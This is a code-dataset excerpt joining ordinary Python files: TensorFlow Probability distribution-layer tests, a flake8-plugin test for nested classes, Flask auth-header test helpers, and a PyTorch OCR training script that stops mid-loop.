        tf.reshape(distribution.loc, tf.concat([batch_shape, [-1]], axis=-1)),
        tfd.softplus_inverse(tf.reshape(
            distribution.scale, tf.concat([batch_shape, [-1]], axis=-1)))
    ], -1)

  def test_keras_sequential_with_unknown_input_size(self):
    """The layer must work when its input shape is not statically known."""
    input_shape = [28, 28, 1]
    encoded_shape = self._build_tensor([2], dtype=np.int32)
    params_size = tfpl.IndependentNormal.params_size(encoded_shape)

    def reshape(x):
      # Fold the Dense output into (..., -1, params_size) groups.
      return tf.reshape(
          x, tf.concat([tf.shape(input=x)[:-1], [-1, params_size]], 0))

    # Test a Sequential model where the input to IndependentNormal does not
    # have a statically-known shape.
    encoder = tfk.Sequential([
        tfkl.InputLayer(input_shape=input_shape, dtype=self.dtype),
        tfkl.Flatten(),
        tfkl.Dense(12, activation='relu'),
        tfkl.Lambda(reshape),
        # When encoded_shape/params_size are placeholders, the input to the
        # IndependentNormal has shape (?, ?, ?) or (1, ?, ?), depending on
        # whether or not encoded_shape's shape is known.
        tfpl.IndependentNormal(encoded_shape),
        tfkl.Lambda(lambda x: x + 0.)  # To force conversion to tensor.
    ])

    x = np.random.randn(*([1] + input_shape)).astype(self.dtype)
    self.assertEqual((1, 3, 2), encoder.predict_on_batch(x).shape)

    out = encoder(tf.convert_to_tensor(value=x))
    if tf.executing_eagerly():
      self.assertEqual((1, 3, 2), out.shape)
    elif self.use_static_shape:
      # In graph mode the middle dims stay unknown until evaluation.
      self.assertEqual([1, None, None], out.shape.as_list())
    self.assertEqual((1, 3, 2), self.evaluate(out).shape)
@test_util.run_all_in_graph_and_eager_modes
class IndependentNormalTestDynamicShape(tf.test.TestCase,
                                        _IndependentNormalTest):
  # Run the shared Normal tests with float32 inputs and dynamic shapes.
  dtype = np.float32
  use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class IndependentNormalTestStaticShape(tf.test.TestCase,
                                       _IndependentNormalTest):
  # Run the shared Normal tests with float64 inputs and static shapes.
  dtype = np.float64
  use_static_shape = True

  def test_doc_string(self):
    """Doc-string example: a tiny encoder ending in IndependentNormal."""
    input_shape = [28, 28, 1]
    encoded_shape = 2
    encoder = tfk.Sequential([
        tfkl.InputLayer(input_shape=input_shape, dtype=self.dtype),
        tfkl.Flatten(),
        tfkl.Dense(10, activation='relu'),
        tfkl.Dense(tfpl.IndependentNormal.params_size(encoded_shape)),
        tfpl.IndependentNormal(encoded_shape),
        tfkl.Lambda(lambda x: x + 0.)  # To force conversion to tensor.
    ])

    # Test that we can run the model and get a sample.
    x = np.random.randn(*([1] + input_shape)).astype(self.dtype)
    self.assertEqual((1, 2), encoder.predict_on_batch(x).shape)

    out = encoder(tf.convert_to_tensor(value=x))
    self.assertEqual((1, 2), out.shape)
    self.assertEqual((1, 2), self.evaluate(out).shape)
@test_util.run_all_in_graph_and_eager_modes
class _IndependentPoissonTest(_IndependentLayerTest):
  """Shared IndependentLayer tests specialized to `tfpl.IndependentPoisson`."""
  layer_class = tfpl.IndependentPoisson
  dist_class = tfd.Poisson

  def _distribution_to_params(self, distribution, batch_shape):
    # A Poisson is parameterized by log_rate alone; flatten the event dims
    # back into one trailing axis to match the layer's input layout.
    return tf.reshape(distribution.log_rate,
                      tf.concat([batch_shape, [-1]], axis=-1))
@test_util.run_all_in_graph_and_eager_modes
class IndependentPoissonTestDynamicShape(tf.test.TestCase,
                                         _IndependentPoissonTest):
  # Run the shared Poisson tests with float32 inputs and dynamic shapes.
  dtype = np.float32
  use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class IndependentPoissonTestStaticShape(tf.test.TestCase,
                                        _IndependentPoissonTest):
  # Run the shared Poisson tests with float64 inputs and static shapes.
  dtype = np.float64
  use_static_shape = True

  def test_doc_string(self):
    """Doc-string example: a one-unit Poisson regression, fit for one step."""
    # Create example data: y ~ Poisson(log_rate = x @ w - 0.141).
    n = 2000
    d = 4
    x = self.evaluate(tfd.Uniform(low=1., high=10.).sample([n, d], seed=42))
    w = [[0.314], [0.272], [-0.162], [0.058]]
    log_rate = tf.matmul(x, w) - 0.141
    y = self.evaluate(tfd.Poisson(log_rate=log_rate).sample())

    # Poisson regression.
    model = tfk.Sequential([
        tfkl.Dense(tfpl.IndependentPoisson.params_size(1)),
        tfpl.IndependentPoisson(1)
    ])

    # Fit (smoke test only: a single step, no accuracy assertion).
    model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.05),
        loss=lambda y, model: -model.log_prob(y),
        metrics=[])
    batch_size = 50
    model.fit(x, y,
              batch_size=batch_size,
              epochs=1,
              steps_per_epoch=1,  # Usually `n // batch_size`.
              verbose=True,
              shuffle=True)
@test_util.run_all_in_graph_and_eager_modes
class _MixtureLayerTest(object):
  """Base class for testing mixture (same-family) distribution layers.

  Instances of subclasses must set:
    self.layer_class: The mixture distribution layer class.
    self.dist_class: The underlying component `tfd.Distribution` class.
    self.dtype: The data type for the parameters passed to the layer.
    self.use_static_shape: Whether or not test tensor inputs should have
      statically-known shapes.
  """

  def _distribution_to_params(self, distribution, batch_shape):
    """Given a self.layer_class instance, return a tensor of its parameters."""
    raise NotImplementedError

  def _build_tensor(self, ndarray, dtype=None):
    # Enforce parameterized dtype and static/dynamic testing.
    ndarray = np.asarray(ndarray).astype(
        dtype if dtype is not None else self.dtype)
    return tf.compat.v1.placeholder_with_default(
        input=ndarray, shape=ndarray.shape if self.use_static_shape else None)

  def _check_distribution(self, t, x, batch_shape):
    # The layer must build a MixtureSameFamily whose mixture weights are a
    # Categorical and whose components wrap self.dist_class in Independent.
    self.assertIsInstance(x, tfd.MixtureSameFamily)
    self.assertIsInstance(x.mixture_distribution, tfd.Categorical)
    self.assertIsInstance(x.components_distribution, tfd.Independent)
    self.assertIsInstance(x.components_distribution.distribution,
                          self.dist_class)
    # Round-trip: recovering the parameters from the distribution must give
    # back (approximately) the tensor that was fed to the layer.
    t_back = self._distribution_to_params(x, batch_shape)
    [t_, t_back_] = self.evaluate([t, t_back])
    self.assertAllClose(t_, t_back_, atol=1e-6, rtol=1e-5)

  def test_new(self):
    """Calls the layer's static `new` factory directly."""
    n = self._build_tensor(4, dtype=np.int32)
    event_shape = self._build_tensor(3, dtype=np.int32)
    p = self.layer_class.params_size(n, event_shape)

    batch_shape = self._build_tensor([4, 2], dtype=np.int32)
    low = self._build_tensor(-3.)
    high = self._build_tensor(3.)
    t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)

    x = self.layer_class.new(t, n, event_shape, validate_args=True)
    self._check_distribution(t, x, batch_shape)

  def test_layer(self):
    """Calls a layer instance on a random parameter tensor."""
    n = self._build_tensor(3, dtype=np.int32)
    event_shape = self._build_tensor([4, 2], dtype=np.int32)
    p = self.layer_class.params_size(n, event_shape)

    batch_shape = self._build_tensor([7, 3], dtype=np.int32)
    low = self._build_tensor(-3.)
    high = self._build_tensor(3.)
    t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)

    layer = self.layer_class(n, event_shape, validate_args=True)
    x = layer(t)
    self._check_distribution(t, x, batch_shape)
@test_util.run_all_in_graph_and_eager_modes
class _MixtureLogisticTest(_MixtureLayerTest):
  """Shared MixtureLayer tests specialized to `tfpl.MixtureLogistic`."""
  layer_class = tfpl.MixtureLogistic
  dist_class = tfd.Logistic

  def _distribution_to_params(self, distribution, batch_shape):
    """Given a self.layer_class instance, return a tensor of its parameters."""
    params_shape = tf.concat([batch_shape, [-1]], axis=0)
    batch_and_n_shape = tf.concat(
        [tf.shape(input=distribution.mixture_distribution.logits), [-1]],
        axis=0)
    cd = distribution.components_distribution.distribution
    # Mixture logits come first, then the per-component (loc, softplus-inverse
    # scale) pairs flattened back into the layer's parameter layout.
    return tf.concat([
        distribution.mixture_distribution.logits,
        tf.reshape(tf.concat([
            tf.reshape(cd.loc, batch_and_n_shape),
            tf.reshape(tfd.softplus_inverse(cd.scale), batch_and_n_shape)
        ], axis=-1), params_shape),
    ], axis=-1)

  def test_doc_string(self):
    """Mixture-density-network example, fit briefly as a smoke test."""
    # Load data (graph of a cardioid).
    n = 2000
    t = self.evaluate(tfd.Uniform(low=-np.pi, high=np.pi).sample([n, 1]))
    r = 2 * (1 - tf.cos(t))
    x = tf.convert_to_tensor(value=self.evaluate(
        r * tf.sin(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))
    y = tf.convert_to_tensor(value=self.evaluate(
        r * tf.cos(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))

    # Model the distribution of y given x with a Mixture Density Network.
    event_shape = self._build_tensor([1], dtype=np.int32)
    num_components = self._build_tensor(5, dtype=np.int32)
    # Fixed: previously used `tfpl.MixtureNormal.params_size` here, which
    # happens to coincide numerically but exercised the wrong class; use
    # this layer's own params_size.
    params_size = tfpl.MixtureLogistic.params_size(num_components, event_shape)
    model = tfk.Sequential([
        tfkl.Dense(12, activation='relu'),
        # NOTE: We must hard-code 15 below, instead of using `params_size`,
        # because the first argument to `tfkl.Dense` must be an integer (and
        # not, e.g., a placeholder tensor).
        tfkl.Dense(15, activation=None),
        tfpl.MixtureLogistic(num_components, event_shape),
    ])

    # Fit.
    batch_size = 100
    model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.02),
        loss=lambda y, model: -model.log_prob(y))
    model.fit(x, y,
              batch_size=batch_size,
              epochs=1,
              steps_per_epoch=n // batch_size)
    # 5 components * (1 logit + 2 params * 1 event dim) = 15.
    self.assertEqual(15, self.evaluate(tf.convert_to_tensor(value=params_size)))
@test_util.run_all_in_graph_and_eager_modes
class MixtureLogisticTestDynamicShape(tf.test.TestCase,
                                      _MixtureLogisticTest):
  # Run the shared MixtureLogistic tests with float64, dynamic shapes.
  dtype = np.float64
  use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class MixtureLogisticTestStaticShape(tf.test.TestCase,
                                     _MixtureLogisticTest):
  # Run the shared MixtureLogistic tests with float32, static shapes.
  dtype = np.float32
  use_static_shape = True
@test_util.run_all_in_graph_and_eager_modes
class _MixtureNormalTest(_MixtureLayerTest):
  """Shared MixtureLayer tests specialized to `tfpl.MixtureNormal`."""
  layer_class = tfpl.MixtureNormal
  dist_class = tfd.Normal

  def _distribution_to_params(self, distribution, batch_shape):
    """Given a self.layer_class instance, return a tensor of its parameters."""
    params_shape = tf.concat([batch_shape, [-1]], axis=0)
    batch_and_n_shape = tf.concat(
        [tf.shape(input=distribution.mixture_distribution.logits), [-1]],
        axis=0)
    cd = distribution.components_distribution.distribution
    # Mixture logits come first, then the per-component (loc, softplus-inverse
    # scale) pairs flattened back into the layer's parameter layout.
    return tf.concat([
        distribution.mixture_distribution.logits,
        tf.reshape(tf.concat([
            tf.reshape(cd.loc, batch_and_n_shape),
            tf.reshape(tfd.softplus_inverse(cd.scale), batch_and_n_shape)
        ], axis=-1), params_shape),
    ], axis=-1)

  def test_doc_string(self):
    """Mixture-density-network example, fit briefly as a smoke test."""
    # Load data (graph of a cardioid).
    n = 2000
    t = self.evaluate(tfd.Uniform(low=-np.pi, high=np.pi).sample([n, 1]))
    r = 2 * (1 - tf.cos(t))
    x = tf.convert_to_tensor(value=self.evaluate(
        r * tf.sin(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))
    y = tf.convert_to_tensor(value=self.evaluate(
        r * tf.cos(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))

    # Model the distribution of y given x with a Mixture Density Network.
    event_shape = self._build_tensor([1], dtype=np.int32)
    num_components = self._build_tensor(5, dtype=np.int32)
    params_size = tfpl.MixtureNormal.params_size(num_components, event_shape)
    model = tfk.Sequential([
        tfkl.Dense(12, activation='relu'),
        # NOTE: We must hard-code 15 below, instead of using `params_size`,
        # because the first argument to `tfkl.Dense` must be an integer (and
        # not, e.g., a placeholder tensor).
        tfkl.Dense(15, activation=None),
        tfpl.MixtureNormal(num_components, event_shape),
    ])

    # Fit.
    batch_size = 100
    model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.02),
        loss=lambda y, model: -model.log_prob(y))
    model.fit(x, y,
              batch_size=batch_size,
              epochs=1,
              steps_per_epoch=n // batch_size)
    # 5 components * (1 logit + 2 params * 1 event dim) = 15.
    self.assertEqual(15, self.evaluate(tf.convert_to_tensor(value=params_size)))
@test_util.run_all_in_graph_and_eager_modes
class MixtureNormalTestDynamicShape(tf.test.TestCase,
                                    _MixtureNormalTest):
  # Run the shared MixtureNormal tests with float32, dynamic shapes.
  dtype = np.float32
  use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class MixtureNormalTestStaticShape(tf.test.TestCase,
                                   _MixtureNormalTest):
  # Run the shared MixtureNormal tests with float64, static shapes.
  dtype = np.float64
  use_static_shape = True
@test_util.run_all_in_graph_and_eager_modes
class _MixtureSameFamilyTest(object):
  """Tests for `tfpl.MixtureSameFamily` with MultivariateNormalTriL components."""

  def _build_tensor(self, ndarray, dtype=None):
    # Enforce parameterized dtype and static/dynamic testing.
    ndarray = np.asarray(ndarray).astype(
        dtype if dtype is not None else self.dtype)
    return tf.compat.v1.placeholder_with_default(
        input=ndarray, shape=ndarray.shape if self.use_static_shape else None)

  def _check_distribution(self, t, x, batch_shape):
    self.assertIsInstance(x, tfd.MixtureSameFamily)
    self.assertIsInstance(x.mixture_distribution, tfd.Categorical)
    self.assertIsInstance(x.components_distribution, tfd.MultivariateNormalTriL)

    shape = tf.concat([batch_shape, [-1]], axis=0)
    batch_and_n_shape = tf.concat(
        [tf.shape(input=x.mixture_distribution.logits), [-1]], axis=0)
    cd = x.components_distribution
    # Same ScaleTriL bijector (with diag shift) used by the MVN-TriL layer,
    # so inverting the dense scale recovers the raw parameter slice.
    scale_tril = tfb.ScaleTriL(diag_shift=np.array(1e-5, self.dtype))
    # Round-trip: mixture logits, then per-component locs and inverted
    # scale-tril entries, reshaped back into the layer's input layout.
    t_back = tf.concat([
        x.mixture_distribution.logits,
        tf.reshape(tf.concat([
            tf.reshape(cd.loc, batch_and_n_shape),
            tf.reshape(
                scale_tril.inverse(cd.scale.to_dense()),
                batch_and_n_shape),
        ], axis=-1), shape),
    ], axis=-1)
    [t_, t_back_] = self.evaluate([t, t_back])
    self.assertAllClose(t_, t_back_, atol=1e-6, rtol=1e-5)

  def test_new(self):
    """Calls the static `new` factory with an MVN-TriL component layer."""
    n = self._build_tensor(4, dtype=np.int32)
    batch_shape = self._build_tensor([4, 2], dtype=np.int32)
    event_size = self._build_tensor(3, dtype=np.int32)
    low = self._build_tensor(-3.)
    high = self._build_tensor(3.)

    cps = tfpl.MultivariateNormalTriL.params_size(event_size)
    p = tfpl.MixtureSameFamily.params_size(n, cps)

    t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)
    normal = tfpl.MultivariateNormalTriL(event_size, validate_args=True)
    x = tfpl.MixtureSameFamily.new(t, n, normal, validate_args=True)
    self._check_distribution(t, x, batch_shape)

  def test_layer(self):
    """Calls a MixtureSameFamily layer instance on a parameter tensor."""
    n = self._build_tensor(3, dtype=np.int32)
    batch_shape = self._build_tensor([7, 3], dtype=np.int32)
    event_size = self._build_tensor(4, dtype=np.int32)
    low = self._build_tensor(-3.)
    high = self._build_tensor(3.)

    cps = tfpl.MultivariateNormalTriL.params_size(event_size)
    p = tfpl.MixtureSameFamily.params_size(n, cps)

    normal = tfpl.MultivariateNormalTriL(event_size, validate_args=True)
    layer = tfpl.MixtureSameFamily(n, normal, validate_args=True)
    t = tfd.Uniform(low, high).sample(tf.concat([batch_shape, [p]], 0), seed=42)
    x = layer(t)
    self._check_distribution(t, x, batch_shape)

  def test_doc_string(self):
    """Mixture-density-network example, fit briefly as a smoke test."""
    # Load data (graph of a cardioid).
    n = 2000
    t = self.evaluate(tfd.Uniform(low=-np.pi, high=np.pi).sample([n, 1]))
    r = 2 * (1 - tf.cos(t))
    x = tf.convert_to_tensor(value=self.evaluate(
        r * tf.sin(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))
    y = tf.convert_to_tensor(value=self.evaluate(
        r * tf.cos(t) + tfd.Normal(loc=0., scale=0.1).sample([n, 1])))

    # Model the distribution of y given x with a Mixture Density Network.
    event_shape = self._build_tensor([1], dtype=np.int32)
    num_components = self._build_tensor(5, dtype=np.int32)
    params_size = tfpl.MixtureSameFamily.params_size(
        num_components, tfpl.IndependentNormal.params_size(event_shape))
    model = tfk.Sequential([
        tfkl.Dense(12, activation='relu'),
        # NOTE: We must hard-code 15 below, instead of using `params_size`,
        # because the first argument to `tfkl.Dense` must be an integer (and
        # not, e.g., a placeholder tensor).
        tfkl.Dense(15, activation=None),
        tfpl.MixtureSameFamily(num_components,
                               tfpl.IndependentNormal(event_shape)),
    ])

    # Fit.
    batch_size = 100
    model.compile(
        optimizer=tf.compat.v1.train.AdamOptimizer(learning_rate=0.02),
        loss=lambda y, model: -model.log_prob(y))
    model.fit(x, y,
              batch_size=batch_size,
              epochs=1,
              steps_per_epoch=1)  # Usually `n // batch_size`.
    # 5 components * (1 logit + 2 params * 1 event dim) = 15.
    self.assertEqual(15, self.evaluate(tf.convert_to_tensor(value=params_size)))
@test_util.run_all_in_graph_and_eager_modes
class MixtureSameFamilyTestDynamicShape(tf.test.TestCase,
                                        _MixtureSameFamilyTest):
  # Run the shared MixtureSameFamily tests with float32, dynamic shapes.
  dtype = np.float32
  use_static_shape = False
@test_util.run_all_in_graph_and_eager_modes
class MixtureSameFamilyTestStaticShape(tf.test.TestCase,
                                       _MixtureSameFamilyTest):
  # Run the shared MixtureSameFamily tests with float64, static shapes.
  dtype = np.float64
  use_static_shape = True
if __name__ == '__main__':
  # Run all TestCase classes in this module under the TF test runner.
  tf.test.main()
| 37.45 | 95 | 0.664254 |
601b8d28512481cb6825f5d1bfd2db3bcb628130 | 5,091 | py | Python | tests/test_visitors/test_ast/test_complexity/test_nested/test_nested_classes.py | Andrka/wemake-python-styleguide | 0c55d4134ee0e236d5dd1b2b5ef1c74def0e804c | [
"MIT"
] | 1 | 2020-05-21T17:58:52.000Z | 2020-05-21T17:58:52.000Z | tests/test_visitors/test_ast/test_complexity/test_nested/test_nested_classes.py | RJ722/wemake-python-styleguide | bca3c673cf6802bb1ed53b1c547924a601c0bbc5 | [
"MIT"
] | 1 | 2020-07-20T14:46:02.000Z | 2020-07-21T17:05:35.000Z | tests/test_visitors/test_ast/test_complexity/test_nested/test_nested_classes.py | RJ722/wemake-python-styleguide | bca3c673cf6802bb1ed53b1c547924a601c0bbc5 | [
"MIT"
] | 1 | 2021-02-14T06:00:44.000Z | 2021-02-14T06:00:44.000Z | import pytest
from wemake_python_styleguide.options.defaults import NESTED_CLASSES_WHITELIST
from wemake_python_styleguide.violations.best_practices import (
NestedClassViolation,
)
from wemake_python_styleguide.visitors.ast.complexity.nested import (
NestedComplexityVisitor,
)
nested_class_in_class = """
class Parent(object):
class {0}(object): ...
"""
nested_class_in_method = """
class Parent(object):
def container(self):
class {0}(object): ...
"""
nested_class_in_function = """
def container():
class {0}(object): ...
"""
nested_class_in_if = """
def container():
if some_value:
class {0}(object): ...
"""
nested_class_in_if_else = """
def container():
if some_value:
...
else:
class {0}(object): ...
"""
nested_class_in_context_manager = """
def container():
with open() as file_obj:
class {0}(object): ...
"""
nested_class_in_for_loop = """
def container():
for some in iterable():
class {0}(object): ...
"""
nested_class_in_while_loop = """
def container():
while True:
class {0}(object): ...
"""
nested_class_in_try = """
def container():
try:
class {0}(object): ...
except:
...
"""
nested_class_in_except = """
def container():
try:
...
except:
class {0}(object): ...
"""
nested_class_in_try_else = """
def container():
try:
...
except:
...
else:
class {0}(object): ...
"""
nested_class_in_try_finally = """
def container():
try:
...
finally:
class {0}(object): ...
"""
@pytest.mark.parametrize('code', [
    nested_class_in_class,
    nested_class_in_method,
    nested_class_in_function,
    nested_class_in_if,
    nested_class_in_if_else,
    nested_class_in_context_manager,
    nested_class_in_for_loop,
    nested_class_in_while_loop,
    nested_class_in_try,
    nested_class_in_except,
    nested_class_in_try_else,
    nested_class_in_try_finally,
])
def test_nested_class(
    assert_errors,
    assert_error_text,
    parse_ast_tree,
    code,
    default_options,
    mode,
):
    """Testing that nested classes are restricted."""
    # A name outside the whitelist must trigger the violation in every
    # nesting construct.
    nested_name = 'NestedClass'
    tree = parse_ast_tree(mode(code.format(nested_name)))

    visitor = NestedComplexityVisitor(default_options, tree=tree)
    visitor.run()

    assert_errors(visitor, [NestedClassViolation])
    assert_error_text(visitor, nested_name)
@pytest.mark.parametrize('whitelist_name', NESTED_CLASSES_WHITELIST)
@pytest.mark.parametrize('code', [
    nested_class_in_class,
])
def test_whitelist_nested_classes(
    assert_errors,
    parse_ast_tree,
    whitelist_name,
    code,
    default_options,
    mode,
):
    """Testing that it is possible to nest whitelisted classes."""
    # Whitelisted names (e.g. `Meta`) are allowed, but only inside a class.
    tree = parse_ast_tree(mode(code.format(whitelist_name)))

    visitor = NestedComplexityVisitor(default_options, tree=tree)
    visitor.run()

    assert_errors(visitor, [])
@pytest.mark.parametrize('whitelist_name', [
    *NESTED_CLASSES_WHITELIST,
    'NestedClass',
])
@pytest.mark.parametrize('code', [
    nested_class_in_class,
])
def test_custom_whitelist_nested_classes(
    assert_errors,
    parse_ast_tree,
    whitelist_name,
    code,
    options,
    mode,
):
    """Testing that it is possible to nest custom whitelisted classes."""
    tree = parse_ast_tree(mode(code.format(whitelist_name)))

    # Extend the configured whitelist with a custom name; both default and
    # custom names must then pass without violations.
    option_values = options(
        nested_classes_whitelist=[*NESTED_CLASSES_WHITELIST, 'NestedClass'],
    )
    visitor = NestedComplexityVisitor(option_values, tree=tree)
    visitor.run()

    assert_errors(visitor, [])
@pytest.mark.parametrize('whitelist_name', [
    *NESTED_CLASSES_WHITELIST,
    'NestedClass',
])
@pytest.mark.parametrize('code', [
    # Fixed: `nested_class_in_method` and `nested_class_in_function` were
    # previously listed twice each, running identical test cases.
    nested_class_in_method,
    nested_class_in_function,
    nested_class_in_if,
    nested_class_in_if_else,
    nested_class_in_context_manager,
    nested_class_in_for_loop,
    nested_class_in_while_loop,
    nested_class_in_try,
    nested_class_in_except,
    nested_class_in_try_else,
    nested_class_in_try_finally,
])
def test_whitelist_nested_classes_in_functions(
    assert_errors,
    assert_error_text,
    parse_ast_tree,
    whitelist_name,
    code,
    default_options,
    mode,
):
    """Testing that it is restricted to nest any classes in functions."""
    # The whitelist only applies inside classes: even whitelisted names must
    # raise the violation when nested inside a function/method body.
    tree = parse_ast_tree(mode(code.format(whitelist_name)))

    visitor = NestedComplexityVisitor(default_options, tree=tree)
    visitor.run()

    assert_errors(visitor, [NestedClassViolation])
    assert_error_text(visitor, whitelist_name)
def test_ordinary_class(
    assert_errors,
    parse_ast_tree,
    default_options,
    mode,
):
    """Testing that it is possible to write basic classes."""
    # Two sibling top-level classes (one inheriting the other) must not be
    # reported as nested.
    tree = parse_ast_tree(mode("""
    class Ordinary(object):
        def method(self): ...

    class Second(Ordinary):
        def method(self): ...
    """))

    visitor = NestedComplexityVisitor(default_options, tree=tree)
    visitor.run()

    assert_errors(visitor, [])
| 21.849785 | 78 | 0.683559 |
780fbf02b26f81df8e5ab2643cd409568d776382 | 323 | py | Python | backend/tests/utils.py | mikhailsidorov/flask-react-jwt-auth-sample | fe2ff7ad98aa4d912d5c02c8ef4fc1fe9d54bce1 | [
"MIT"
] | null | null | null | backend/tests/utils.py | mikhailsidorov/flask-react-jwt-auth-sample | fe2ff7ad98aa4d912d5c02c8ef4fc1fe9d54bce1 | [
"MIT"
] | 1 | 2018-10-25T10:05:56.000Z | 2018-10-25T10:05:56.000Z | backend/tests/utils.py | mikhailsidorov/flask-react-jwt-auth-sample | fe2ff7ad98aa4d912d5c02c8ef4fc1fe9d54bce1 | [
"MIT"
] | null | null | null | from base64 import b64encode
def make_basic_auth_headers(username, password):
    """Return a dict holding an HTTP Basic ``Authorization`` header.

    The credentials are joined as ``username:password`` and base64-encoded,
    per RFC 7617.
    """
    credentials = "{0}:{1}".format(username, password)
    token = b64encode(bytes(credentials, 'ascii')).decode('ascii')
    return {'Authorization': 'Basic ' + token}
def make_token_auth_headers(access_token):
    """Return a dict holding an HTTP Bearer ``Authorization`` header."""
    header_value = 'Bearer ' + access_token
    return {'Authorization': header_value}
| 26.916667 | 69 | 0.681115 |
e023f72a2817f963e105aa1bcb5c304d37cbcae4 | 4,718 | py | Python | train.py | zhenming33/RAN_torch | cb419145f15b4bf3036862d85e672ba795bdd410 | [
"Apache-2.0"
] | 8 | 2019-07-16T15:31:24.000Z | 2022-03-05T12:40:09.000Z | train.py | WenmuZhou/RAN_torch | cb419145f15b4bf3036862d85e672ba795bdd410 | [
"Apache-2.0"
] | 4 | 2019-07-06T07:03:31.000Z | 2022-03-12T09:55:04.000Z | train.py | WenmuZhou/RAN_torch | cb419145f15b4bf3036862d85e672ba795bdd410 | [
"Apache-2.0"
] | 7 | 2019-06-10T03:08:42.000Z | 2021-03-13T03:24:09.000Z | import os
# Pin training to GPU 3; must run before torch/CUDA initialization below.
os.environ["CUDA_VISIBLE_DEVICES"] = "3"
import torch
from torch import nn
import torch.optim as optim
from torch.nn.utils.rnn import pack_padded_sequence
from model import Model
from tensorboardX import SummaryWriter
import numpy as np
from tqdm import tqdm
from data_loader import dataset
import Levenshtein
from utils import *
from torch.utils.data import DataLoader
# ---- Training configuration ----
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
train_steps = 50          # outer training epochs
train_steps_size = 1000   # iterations per outer epoch
batch_size = 256
lr = 1e-3                 # initial learning rate (decayed x0.1 once at step 3000)
image_channel = 3
alpha_c = 1.              # weight of the attention regularization term
grad_clip = 5.            # gradient clipping threshold
valid_interval = 50       # validate every N global steps
valid_steps = 1           # NOTE(review): defined but unused below — confirm
save_interval = 1000      # checkpoint every N global steps
label_path = 'labels.txt'
vocab_path = 'radical_alphabet.txt'
dict_path = 'char2seq_dict.pkl'
# Radical vocabulary: first line of the alphabet file with the literal
# characters 's', 'e', 'p' appended (presumably start/end/pad markers —
# confirm against the data loader's index conventions).
word_map = open(vocab_path, encoding='utf-8').readlines()[0]
word_map = word_map + 'sep'
vocab_size = len(word_map)
save_dir = 'weights'
log_dir = 'logs/lr1e-3+batch256+edropout0.5+xvaier+data_shuff+grad_clip+lrdeacy'
if not os.path.exists(save_dir):
    os.mkdir(save_dir)
# train step
def train_step(model, criterion, optimizer, images, encoded_captions, caption_lengths):
    """Run one optimization step on a batch; return the regularized loss."""
    model.train()
    optimizer.zero_grad()
    scores, caps_sorted, decode_lengths, alphas, sort_ind = model(images, encoded_captions, caption_lengths)
    targets = caps_sorted
    # Pack by decode_lengths so padded time steps are excluded from the loss.
    scores_pad, _ = pack_padded_sequence(scores, decode_lengths, batch_first=True)
    targets_pad, _ = pack_padded_sequence(targets, decode_lengths, batch_first=True)
    loss = criterion(scores_pad, targets_pad)
    # Attention regularization: penalize attention weights whose sum over
    # decode steps deviates from 1 at each location.
    loss += alpha_c * ((1. - alphas.sum(dim=1)) ** 2).mean()
    loss.backward()
    clip_gradient(model, grad_clip)  # helper from `utils` (star import)
    # clip_gradient(optimizer, grad_clip)
    optimizer.step()
    return loss
def valid_step(model, criterion, images, encoded_captions, caption_lengths):
    """Evaluate one batch without gradients.

    Returns (loss, alphas, decoded prediction string, decoded label string,
    sort_ind) where the decoded strings come from the first sample of the
    length-sorted batch only.
    """
    with torch.no_grad():
        model.eval()
        scores, caps_sorted, decode_lengths, alphas, sort_ind = model(images, encoded_captions, caption_lengths)
        targets = caps_sorted
        scores_pad, _ = pack_padded_sequence(scores, decode_lengths, batch_first=True)
        targets_pad, _ = pack_padded_sequence(targets, decode_lengths, batch_first=True)
        loss = criterion(scores_pad, targets_pad)
        loss += alpha_c * ((1. - alphas.sum(dim=1)) ** 2).mean()
        # Greedy-decode the first sample for monitoring/logging.
        pred_index = torch.argmax(scores[0], 1).cpu().numpy()
        preds = [word_map[c] for c in pred_index]
        label_index = caps_sorted[0, :max(decode_lengths)].cpu().numpy()
        labels = [word_map[c] for c in label_index]
        preds = ''.join(preds)
        labels = ''.join(labels)
        return loss, alphas, preds, labels, sort_ind
if __name__ == "__main__":
    # add records
    writer = SummaryWriter(log_dir)
    dataloader = data_gen(batch_size, dataset, label_path, vocab_path, dict_path, train_percent=0.7, num_workers=1)
    model = Model(image_channel, vocab_size).to(device)
    optimizer = optim.Adam(model.parameters(), lr=lr)
    criterion = nn.CrossEntropyLoss().to(device)
    global_step = 0
    # record_graph(writer, model)
    for i in range(train_steps):
        print('train steps ' + str(i))
        for k in tqdm(range(train_steps_size)):
            if global_step == 3000:
                # One-time LR decay; also rebind `lr` so the value logged
                # below stays in sync with the optimizer.
                adjust_learning_rate(optimizer, 0.1)
                lr = lr * 0.1
            record_scale(writer, lr, global_step, 'lr')
            images, encoded_captions, caption_lengths = dataloader.train()
            loss = train_step(model, criterion, optimizer, images, encoded_captions, caption_lengths)
            record_scale(writer, loss, global_step, 'train/loss')
            if global_step % valid_interval == 0:
                images, encoded_captions, caption_lengths = dataloader.valid()
                loss, alphas, preds, labels, sort_ind = valid_step(model, criterion, images, encoded_captions, caption_lengths)
                images = images[sort_ind]
                record_scale(writer, loss, global_step, 'valid/loss')
                # record_images(writer, images, global_step)
                # for t in range(max(caption_lengths).item()):
                #     record_attention(writer, alphas, t, global_step)
                # record_text(writer, preds, global_step, 'valid/preds')
                # record_text(writer, labels, global_step, 'valid/labels')
                # Normalized edit distance between the monitored sample's
                # decoded prediction and its label.
                edit_distance = Levenshtein.distance(preds, labels)
                normalized_edit_distance = edit_distance / max(len(preds), len(labels))
                record_scale(writer, normalized_edit_distance, global_step, 'valid/N.E.D')
            if global_step % save_interval == 0:
